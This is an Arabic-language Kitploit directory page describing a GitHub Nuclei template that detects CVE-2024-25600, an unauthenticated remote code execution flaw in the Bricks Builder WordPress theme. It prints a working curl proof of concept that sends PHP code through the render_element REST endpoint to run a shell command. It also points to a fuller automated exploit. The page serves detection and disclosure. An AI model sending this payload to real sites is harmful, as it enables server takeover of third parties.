Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25600_Nuclei-Template — قالب Nuclei ومعلومات حول الـ POC لـ CVE-2024-25600 | Kitploit
أدوات/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

قالب Nuclei ومعلومات حول الـ POC لـ CVE-2024-25600

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
317منذ 2 سنواتتمت المراجعة من قبل Kitploit

CVE-2024-25600_Nuclei-Template

قالب Nuclei ومعلومات حول إثبات المفهوم (POC) لـ CVE-2024-25600

الوصف 📝

ثمة ثغرة أمنية في قالب Bricks لووردبريس تسمح بتنفيذ الأوامر عن بُعد (RCE) في جميع الإصدارات حتى الإصدار 1.9.6. وهذا يجعل من الممكن للمهاجمين غير الموثّقين تنفيذ أكواد ضارة على الخادم. هذا القالب 🛠️ مصمم لاكتشاف الثغرة الأمنية CVE-2024-25600 🕳️ الموجودة في إضافة Bricks Builder لووردبريس باستخدام Nuclei. تسمح الثغرة بتنفيذ أوامر عن بُعد دون مصادقة على المواقع المتضررة 💻.

إثبات المفهوم (PoC) 📝

إثبات المفهوم الكامل (تلقائي) متاح على https://github.com/chocapikk/CVE-2024-25600.

إثبات المفهوم الأساسي الذي قدمه الإفصاح هو كما يلي:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

استبدل [HOST] بالموقع المستهدف و [NONCE] بقيمة nonce المستخرجة من الموقع.

المرجع 📖

لمزيد من المعلومات حول الثغرة الأمنية CVE-2024-25600، يُرجى مراجعة الإفصاح المفصل على Snicco.io.

تنزيل الأداة